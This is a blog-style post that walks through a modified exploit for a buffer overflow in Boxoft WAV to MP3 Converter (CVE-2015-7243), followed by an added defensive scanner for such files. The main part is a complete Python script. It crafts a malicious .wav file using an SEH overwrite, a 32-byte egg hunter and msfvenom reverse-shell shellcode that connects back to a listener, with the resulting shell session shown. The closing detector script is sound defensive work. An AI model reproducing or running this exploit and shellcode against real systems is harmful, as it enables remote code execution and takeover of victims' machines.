I was looking for a vulnerable application to practice SEH Bypass and Egg Hunting techniques. I found this exploit on Exploit-DB which exploits a local buffer overflow vulnerability in Boxoft WAV to MP3 Converter.
The original exploit does nothing more than pop up a message box on the target machine. I modified it to return a reverse shell using SEH bypass and egg hunting, since there was not much space left for the shellcode.
Here is the final exploit code:
#!/usr/bin/python
#-------------------------------------------------------------------------------#
# Exploit: Boxoft WAV to MP3 Converter - 'convert' SEH Overflow (Egghunter)     #
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot                        #
# Vulnerability Credit: Robbie Corley, c0d3rc0rl3y@gmail.com                    #
# https://www.exploit-db.com/exploits/38035/                                    #
# CVE: CVE-2015-7243                                                            #
# OS: Windows 7 SP1 32-bit, Windows XP PRO SP3                                  #
# Software: https://www.exploit-db.com/apps/                                    #
# aa51b473d5c39ae015bcacb24c6c45e5-setup_free-wav-to-mp3_.exe                   #
#-------------------------------------------------------------------------------#
# The original exploit pops up a MessageBox. Modified it for reverse shell      #
# using SEH bypass + Egg Hunter                                                 #
# Thanks to B33f@FuzzySecurity for awesome tutorial on Egg Hunting              #
# http://www.fuzzysecurity.com/tutorials/expDev/4.html                          #
#-------------------------------------------------------------------------------#
#root@kali:~/Desktop# nc -nvlp 443                                              #
#listening on [any] 443 ...                                                     #
#connect to [192.168.253.130] from (UNKNOWN) [192.168.253.128] 49405            #
#Microsoft Windows [Version 6.1.7601]                                           #
#Copyright (c) 2009 Microsoft Corporation. All rights reserved.                 #
#                                                                               #
#C:\Users\IEUser\Desktop>whoami                                                 #
#whoami                                                                         #
#ie11win7\ieuser                                                                #
#                                                                               #
#C:\Users\IEUser\Desktop>                                                       #
#                                                                               #
#-------------------------------------------------------------------------------#

filename = "exploitEgg.wav"

nseh = "\xeb\x09\x90\x90" #JMP 09 bytes over SEH to egg hunting routine instead of next SEH record
seh = "\xd3\x24\x40\x00"  #0x004024d3 POP ECX POP EBP RET

#Egghunter
#Size 32-bytes
#tag = l00t
hunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6c\x30" #l0
"\x30\x74\x8b\xfa" #0t
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.253.130 LPORT=443 -f c -b '\x00\x0a\x0d\x1a' EXITFUNC=thread
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes
shellcode =(
"\xbd\x96\x49\x9e\x43\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x31\x68\x12\x83\xc0\x04\x03\xfe\x47\x7c\xb6\x02\xbf\x02"
"\x39\xfa\x40\x63\xb3\x1f\x71\xa3\xa7\x54\x22\x13\xa3\x38\xcf"
"\xd8\xe1\xa8\x44\xac\x2d\xdf\xed\x1b\x08\xee\xee\x30\x68\x71"
"\x6d\x4b\xbd\x51\x4c\x84\xb0\x90\x89\xf9\x39\xc0\x42\x75\xef"
"\xf4\xe7\xc3\x2c\x7f\xbb\xc2\x34\x9c\x0c\xe4\x15\x33\x06\xbf"
"\xb5\xb2\xcb\xcb\xff\xac\x08\xf1\xb6\x47\xfa\x8d\x48\x81\x32"
"\x6d\xe6\xec\xfa\x9c\xf6\x29\x3c\x7f\x8d\x43\x3e\x02\x96\x90"
"\x3c\xd8\x13\x02\xe6\xab\x84\xee\x16\x7f\x52\x65\x14\x34\x10"
"\x21\x39\xcb\xf5\x5a\x45\x40\xf8\x8c\xcf\x12\xdf\x08\x8b\xc1"
"\x7e\x09\x71\xa7\x7f\x49\xda\x18\xda\x02\xf7\x4d\x57\x49\x90"
"\xa2\x5a\x71\x60\xad\xed\x02\x52\x72\x46\x8c\xde\xfb\x40\x4b"
"\x20\xd6\x35\xc3\xdf\xd9\x45\xca\x1b\x8d\x15\x64\x8d\xae\xfd"
"\x74\x32\x7b\x51\x24\x9c\xd4\x12\x94\x5c\x85\xfa\xfe\x52\xfa"
"\x1b\x01\xb9\x93\xb6\xf8\x2a\x5c\xee\xff\x29\x34\xed\xff\x2c"
"\x7e\x78\x19\x44\x90\x2d\xb2\xf1\x09\x74\x48\x63\xd5\xa2\x35"
"\xa3\x5d\x41\xca\x6a\x96\x2c\xd8\x1b\x56\x7b\x82\x8a\x69\x51"
"\xaa\x51\xfb\x3e\x2a\x1f\xe0\xe8\x7d\x48\xd6\xe0\xeb\x64\x41"
"\x5b\x09\x75\x17\xa4\x89\xa2\xe4\x2b\x10\x26\x50\x08\x02\xfe"
"\x59\x14\x76\xae\x0f\xc2\x20\x08\xe6\xa4\x9a\xc2\x55\x6f\x4a"
"\x92\x95\xb0\x0c\x9b\xf3\x46\xf0\x2a\xaa\x1e\x0f\x82\x3a\x97"
"\x68\xfe\xda\x58\xa3\xba\xfb\xba\x61\xb7\x93\x62\xe0\x7a\xfe"
"\x94\xdf\xb9\x07\x17\xd5\x41\xfc\x07\x9c\x44\xb8\x8f\x4d\x35"
"\xd1\x65\x71\xea\xd2\xaf")

#-------------------------------------------------------------------------------#
# badchars: \x00\x0a\x0d\x1a                                                    #
#-------------------------------------------------------------------------------#
#                                                                               #
# (1) SEH: 0x004024d3 : pop ecx # pop ebp # ret | wavtomp3.exe                  #
# (2) nSEH: JMP 09 bytes over to nopsled => \xEB\x09\x90\x90                    #
# (3) Enough room for egghunter; marker "l00t"                                  #
#-------------------------------------------------------------------------------#

egg = "l00tl00t"
buffer = "A" * (4132 - len(shellcode) - len(egg) - 5 ) + egg + shellcode + "A" * 5 + nseh + seh + "\x90" * 20 + hunter + "B" * (5000 - 4132 - 20 - len(hunter))

file = open(filename,"w")
file.write(buffer)
file.close()

#Open 'exploitEgg.wav' in the converter and boom!
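From the defender's side, a file built this way is easy to pick out: it has no RIFF/WAVE header, it is mostly one repeated filler byte, it carries the tag written twice back to back ("l00tl00t"), and it carries the egg hunter's fixed prologue. The following Python 3 script is an added example, not part of the original post or of the Exploit-DB entry, that scans a .wav blob for exactly those four traces. The 16-byte egg-hunter prologue and the "l00t" tag are taken from the code above; the benign and crafted sample files are constructed inside the script (the crafted one keeps the layout but replaces the reverse-shell payload with NOPs and cuts the hunter after its tag, since the scanner keys on neither).

```python
"""Added example (not the post author's code): triage a .wav blob for the traces
of an SEH-overwrite + egg-hunter file like exploitEgg.wav above.

Assumptions: the egg-hunter prologue and the "l00t" tag are copied from the
exploit on the page; both sample files below are constructed here."""
import re
import struct

# Leading 16 bytes of the NtAccessCheckAndAuditAlarm-based egg hunter shown on
# the page. This prologue is identical wherever the stub is reused; only the
# 4-byte tag after "\xef\xb8" (je displacement, then the mov eax opcode) changes.
EGGHUNTER_STUB = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a"
                  b"\x02\x58\xcd\x2e\x3c\x05\x5a\x74")
TAG_OFFSET = len(EGGHUNTER_STUB) + 2   # skip the je displacement and the mov opcode

# An egg is a 4-byte printable tag written twice back to back, e.g. "l00tl00t".
DOUBLED_TAG_RE = re.compile(rb"([\x21-\x7e]{4})\1")

# A run of a single byte this long is padding, not audio.
FILLER_RUN = 1024
FILLER_RE = re.compile(rb"(.)\1{%d,}" % (FILLER_RUN - 1), re.DOTALL)


def scan_wav(data):
    """Return a list of (kind, offset, detail) findings; an empty list is clean."""
    findings = []
    if data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        findings.append(("not_wav", 0, data[:4]))
    off = data.find(EGGHUNTER_STUB)
    if off != -1:
        tag = data[off + TAG_OFFSET:off + TAG_OFFSET + 4]
        findings.append(("egghunter", off, tag))
    for m in DOUBLED_TAG_RE.finditer(data):
        if len(set(m.group(1))) > 1:        # "AAAAAAAA" is filler, not a tag
            findings.append(("egg_marker", m.start(), m.group(1)))
    for m in FILLER_RE.finditer(data):
        findings.append(("padding", m.start(), len(m.group(0))))
    return findings


def benign_wav(n_samples=2000):
    """Constructed 8-bit mono PCM file: a proper RIFF/WAVE header plus a ramp."""
    pcm = bytes((i * 7) % 256 for i in range(n_samples))
    fmt = struct.pack("<4sIHHIIHH", b"fmt ", 16, 1, 1, 8000, 8000, 1, 8)
    body = b"WAVE" + fmt + struct.pack("<4sI", b"data", len(pcm)) + pcm
    return b"RIFF" + struct.pack("<I", len(body)) + body


def crafted_wav():
    """Constructed stand-in for the page's exploitEgg.wav: filler, doubled tag,
    payload area (NOPs instead of the real shellcode), NOP sled and the hunter
    prologue with its tag; the hunter's tail is omitted."""
    return (b"A" * 3000 + b"l00tl00t" + b"\x90" * 351 + b"A" * 5 +
            b"\x90" * 28 + EGGHUNTER_STUB + b"\xef\xb8" + b"l00t" + b"B" * 800)


if __name__ == "__main__":
    for name, blob in (("benign", benign_wav()), ("crafted", crafted_wav())):
        print(name, scan_wav(blob) or "clean")
```

The prologue match is the strongest of the four signals because it does not depend on the tag, the payload or the offsets chosen by the exploit writer; the header and padding checks are cheap heuristics that catch files built with a different hunter or none at all.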